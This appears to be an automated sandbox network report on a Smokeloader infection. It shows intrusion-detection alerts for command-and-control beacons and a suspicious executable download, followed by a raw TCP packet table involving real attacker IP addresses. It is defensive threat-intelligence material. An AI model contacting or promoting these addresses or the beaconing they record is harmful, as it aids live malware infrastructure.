                                                  2024-09-02T08:21:07.154202+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814973880192.168.2.62.185.214.11
                                                  2024-09-02T08:21:08.487207+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973980192.168.2.62.185.214.11
                                                  2024-09-02T08:21:20.102228+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974780192.168.2.62.185.214.11
                                                  2024-09-02T08:21:20.102228+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814974780192.168.2.62.185.214.11
                                                  2024-09-02T08:21:13.363565+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile249744443192.168.2.684.32.84.152
                                                  2024-09-02T08:20:53.004797+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972780192.168.2.62.185.214.11
                                                  2024-09-02T08:20:55.344856+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972880192.168.2.62.185.214.11
                                                  2024-09-02T08:21:17.770363+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974580192.168.2.62.185.214.11
                                                  2024-09-02T08:20:50.182098+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972580192.168.2.62.185.214.11
                                                  2024-09-02T08:20:42.946482+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972080192.168.2.62.185.214.11
                                                  2024-09-02T08:20:42.946482+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814972080192.168.2.62.185.214.11
                                                  2024-09-02T08:20:49.004934+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972480192.168.2.62.185.214.11
                                                  2024-09-02T08:20:57.633019+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973080192.168.2.62.185.214.11
                                                  2024-09-02T08:21:11.300474+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974280192.168.2.62.185.214.11
                                                  2024-09-02T08:21:22.026288+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974880192.168.2.62.185.214.11
                                                  2024-09-02T08:21:22.026288+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814974880192.168.2.62.185.214.11
                                                  2024-09-02T08:21:05.996542+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973780192.168.2.62.185.214.11
                                                  2024-09-02T08:21:01.659763+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973480192.168.2.62.185.214.11
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 2, 2024 08:20:37.081294060 CEST4971680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:37.086124897 CEST80497162.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:37.086185932 CEST4971680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:37.086312056 CEST4971680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:37.086338043 CEST4971680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:37.091070890 CEST80497162.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:37.091200113 CEST80497162.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:38.264113903 CEST80497162.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:38.268161058 CEST80497162.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:38.270690918 CEST4971680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:38.273922920 CEST4971680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:38.277081966 CEST4971780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:38.278737068 CEST80497162.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:38.281965017 CEST80497172.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:38.282059908 CEST4971780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:38.282176971 CEST4971780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:38.282198906 CEST4971780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:38.287060022 CEST80497172.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:38.287074089 CEST80497172.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:39.421020985 CEST80497172.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:39.421238899 CEST80497172.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:39.421289921 CEST4971780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:39.421878099 CEST4971780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:39.426666975 CEST80497172.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:39.427145958 CEST4971880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:39.431962967 CEST80497182.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:39.432030916 CEST4971880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:39.432214975 CEST4971880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:39.432240963 CEST4971880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:39.436963081 CEST80497182.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:39.436999083 CEST80497182.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:40.546471119 CEST80497182.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:40.547430038 CEST80497182.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:40.547488928 CEST4971880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:40.547553062 CEST4971880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:40.551486969 CEST4971980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:40.552716970 CEST80497182.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:40.556493998 CEST80497192.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:40.556561947 CEST4971980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:40.556700945 CEST4971980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:40.556734085 CEST4971980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:40.561410904 CEST80497192.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:40.561525106 CEST80497192.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:41.704777956 CEST80497192.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:41.704822063 CEST80497192.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:41.705003977 CEST4971980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:41.705292940 CEST4971980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:41.708224058 CEST4972080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:41.710024118 CEST80497192.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:41.713047981 CEST80497202.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:41.713140011 CEST4972080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:41.713304996 CEST4972080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:41.713325024 CEST4972080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:41.718667984 CEST80497202.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:41.719120026 CEST80497202.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:42.945909023 CEST80497202.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:42.945971966 CEST80497202.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:42.946481943 CEST4972080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:42.946504116 CEST4972080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:42.950337887 CEST4972280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:42.951311111 CEST80497202.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:42.955133915 CEST80497222.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:42.955244064 CEST4972280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:42.955528021 CEST4972280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:42.955600977 CEST4972280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:42.960302114 CEST80497222.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:42.960450888 CEST80497222.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:44.470120907 CEST80497222.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:44.470324993 CEST80497222.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:44.470379114 CEST4972280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:44.470412970 CEST4972280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:44.473486900 CEST4972380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:44.475147009 CEST80497222.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:44.478317022 CEST80497232.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:44.478385925 CEST4972380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:44.478555918 CEST4972380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:44.478583097 CEST4972380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:44.483261108 CEST80497232.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:44.483387947 CEST80497232.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:46.136173010 CEST80497232.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:46.136195898 CEST80497232.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:46.136286974 CEST4972380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:46.136498928 CEST4972380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:46.138982058 CEST4972480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:46.141206980 CEST80497232.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:46.143790960 CEST80497242.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:46.143860102 CEST4972480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:46.143955946 CEST4972480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:46.143980026 CEST4972480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:46.148662090 CEST80497242.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:46.148832083 CEST80497242.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:49.003756046 CEST80497242.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:49.004859924 CEST80497242.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:49.004934072 CEST4972480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:49.005085945 CEST4972480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:49.007524014 CEST4972580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:49.009972095 CEST80497242.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:49.012300014 CEST80497252.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:49.012377024 CEST4972580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:49.012497902 CEST4972580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:49.012527943 CEST4972580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:49.017221928 CEST80497252.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:49.017589092 CEST80497252.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:50.181823015 CEST80497252.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:50.181957006 CEST80497252.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:50.182097912 CEST4972580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:50.182125092 CEST4972580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:50.184869051 CEST4972680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:50.186882019 CEST80497252.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:50.189688921 CEST80497262.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:50.189754009 CEST4972680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:50.189841986 CEST4972680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:50.189861059 CEST4972680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:50.195874929 CEST80497262.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:50.195884943 CEST80497262.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:51.829910994 CEST80497262.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:51.829991102 CEST80497262.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:51.830168962 CEST4972680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:51.830672026 CEST4972680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:51.832534075 CEST4972780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:51.835361004 CEST80497262.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:51.837318897 CEST80497272.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:51.837413073 CEST4972780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:51.837527990 CEST4972780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:51.837546110 CEST4972780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:51.842286110 CEST80497272.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:51.842406988 CEST80497272.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:53.004174948 CEST80497272.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:53.004703999 CEST80497272.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:53.004796982 CEST4972780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:53.004947901 CEST4972780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:53.007256985 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:53.010400057 CEST80497272.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:53.012109995 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:53.014869928 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:53.014969110 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:53.014986038 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:53.019746065 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:53.019838095 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.344763041 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.344786882 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.344799042 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.344856024 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.344897032 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.345069885 CEST4972880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.347778082 CEST4972980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.350727081 CEST80497282.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.353598118 CEST80497292.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.353693962 CEST4972980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.353796959 CEST4972980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.353818893 CEST4972980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:55.358622074 CEST80497292.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:55.358663082 CEST80497292.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:56.464382887 CEST80497292.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:56.464431047 CEST80497292.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:56.464488983 CEST4972980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:56.464685917 CEST4972980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:56.467499018 CEST4973080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:56.469458103 CEST80497292.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:56.472434998 CEST80497302.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:56.472507954 CEST4973080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:56.472636938 CEST4973080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:56.472665071 CEST4973080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:56.477374077 CEST80497302.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:56.477406979 CEST80497302.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:57.632760048 CEST80497302.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:57.632942915 CEST80497302.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:57.633018970 CEST4973080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:57.633061886 CEST4973080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:57.635406971 CEST4973180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:57.638137102 CEST80497302.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:57.640302896 CEST80497312.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:57.640499115 CEST4973180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:57.640642881 CEST4973180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:57.640660048 CEST4973180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:57.645416021 CEST80497312.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:57.645512104 CEST80497312.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:59.249829054 CEST80497312.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:59.249847889 CEST80497312.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:59.249947071 CEST4973180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:59.250149012 CEST4973180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:59.252558947 CEST4973380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:59.254965067 CEST80497312.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:59.257432938 CEST80497332.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:59.257525921 CEST4973380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:59.257668972 CEST4973380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:59.257703066 CEST4973380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:20:59.262512922 CEST80497332.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:20:59.262540102 CEST80497332.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:00.505430937 CEST80497332.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:00.505455017 CEST80497332.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:00.505655050 CEST4973380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:00.506056070 CEST4973380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:00.508670092 CEST4973480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:00.510979891 CEST80497332.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:00.513542891 CEST80497342.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:00.513629913 CEST4973480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:00.513787031 CEST4973480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:00.513798952 CEST4973480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:00.519201040 CEST80497342.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:00.519212008 CEST80497342.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:01.659632921 CEST80497342.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:01.659653902 CEST80497342.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:01.659763098 CEST4973480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:01.660022020 CEST4973480192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:01.662322044 CEST4973580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:01.665069103 CEST80497342.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:01.669159889 CEST80497352.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:01.669245005 CEST4973580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:01.669356108 CEST4973580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:01.669368982 CEST4973580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:01.674308062 CEST80497352.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:01.674318075 CEST80497352.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:03.300298929 CEST80497352.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:03.300440073 CEST80497352.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:03.300496101 CEST4973580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:03.300554037 CEST4973580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:03.302830935 CEST4973680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:03.305320024 CEST80497352.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:03.307615042 CEST80497362.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:03.307693005 CEST4973680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:03.307833910 CEST4973680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:03.307857037 CEST4973680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:03.312582016 CEST80497362.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:03.312716961 CEST80497362.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:04.584748030 CEST80497362.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:04.584866047 CEST80497362.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:04.584928989 CEST4973680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:04.615873098 CEST4973680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:04.692626953 CEST4973780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:04.828427076 CEST80497362.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:04.828443050 CEST80497372.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:04.828577995 CEST4973780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:04.828788042 CEST4973780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:04.828809023 CEST4973780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:04.833597898 CEST80497372.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:04.834192991 CEST80497372.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:05.996436119 CEST80497372.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:05.996464014 CEST80497372.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:05.996541977 CEST4973780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:05.996701956 CEST4973780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:05.999905109 CEST4973880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:06.001486063 CEST80497372.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:06.005131006 CEST80497382.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:06.005259991 CEST4973880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:06.005374908 CEST4973880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:06.005395889 CEST4973880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:06.010179996 CEST80497382.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:06.010191917 CEST80497382.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:07.153987885 CEST80497382.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:07.154135942 CEST80497382.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:07.154201984 CEST4973880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:07.159534931 CEST4973880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:07.164393902 CEST80497382.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:07.269273043 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:07.275194883 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:07.275296926 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:07.275456905 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:07.275480032 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:07.280256033 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:07.280292988 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.487118959 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.487159967 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.487169981 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.487206936 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.487246037 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.487334013 CEST4973980192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.489856005 CEST4974180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.496992111 CEST80497392.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.497509003 CEST80497412.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.497571945 CEST4974180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.497749090 CEST4974180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.497760057 CEST4974180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:08.502545118 CEST80497412.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:08.502758026 CEST80497412.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:09.643055916 CEST80497412.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:09.644061089 CEST80497412.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:09.644123077 CEST4974180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:09.644177914 CEST4974180192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:09.646534920 CEST4974280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:09.648979902 CEST80497412.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:09.651376009 CEST80497422.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:09.651460886 CEST4974280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:09.651580095 CEST4974280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:09.651602983 CEST4974280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:09.656383991 CEST80497422.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:09.656395912 CEST80497422.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.300154924 CEST80497422.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.300421953 CEST80497422.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.300473928 CEST4974280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.300534964 CEST4974280192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.303054094 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.305318117 CEST80497422.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.307926893 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.307998896 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.308118105 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.308139086 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.605308056 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:11.847007036 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.847027063 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:11.848867893 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:12.689039946 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:12.689063072 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:12.689150095 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:12.689342976 CEST4974380192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:12.694048882 CEST80497432.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:12.777009964 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:12.777071953 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:12.777194023 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:12.777601004 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:12.777612925 CEST4434974484.32.84.152192.168.2.6
